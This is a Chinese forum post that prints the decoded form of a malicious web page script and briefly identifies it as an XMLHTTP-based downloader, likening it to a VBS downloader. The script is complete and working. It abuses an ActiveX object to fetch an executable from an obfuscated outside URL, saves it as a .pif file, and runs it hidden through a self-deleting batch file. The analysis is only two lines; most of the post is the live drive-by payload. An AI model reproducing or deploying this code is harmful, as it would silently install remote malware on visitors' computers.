- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2005-9-3
- 最后登录
- 2008-10-23
|
解密出来是:
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="javaScript">
var id = "\143\154\141\163\163\151\144";
var id2 = "\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66";
var Ms = "\107\105\124";
var Qq784378237 = "\103\72\134\134\115\151\143\162\157\123\157\146\164\56\160\151\146";
var object = document.createElement("o"+"bje"+"ct");
object.setAttribute(id,id2);
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open(Ms,'\150\164\164\160\72\57\57\144\154\143\157\165\156\164\56\167\150\141\164\164\150\151\163\144\157\167\156\56\143\157\155\57\144\157\167\156\57\144\154\167\145\142\56\145\170\145',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
adodbStream.type = 1;
var cuteqqcn = '\\system32\\cmd.exe';
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialfoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
var wwwcuteqqcn = object.createobject("\x53\x68\x65\x6C\x4C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","");
wwwcuteqqcn.ShelLexecute(cuteqqcn,' /c echo C:\\MicroSoft.pif >C:\\MicroSoft.bat&echo del %0 >>C:\\MicroSoft.bat',"","open",0);
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(Qq784378237,2);
adodbStream.Close();
wwwcuteqqcn.ShelLexecute(cuteqqcn,' /c C:\\MicroSoft.bat',"","open",0);
}
}
userSend();
</script>"
应该是段采用XMLHTTP方式的下载并执行的程序~Micosoft.bat应该为病毒程序
就如同vbs下载者差不多
[ 本帖最后由 chinanic 于 2007-10-12 05:09 编辑 ] |
|
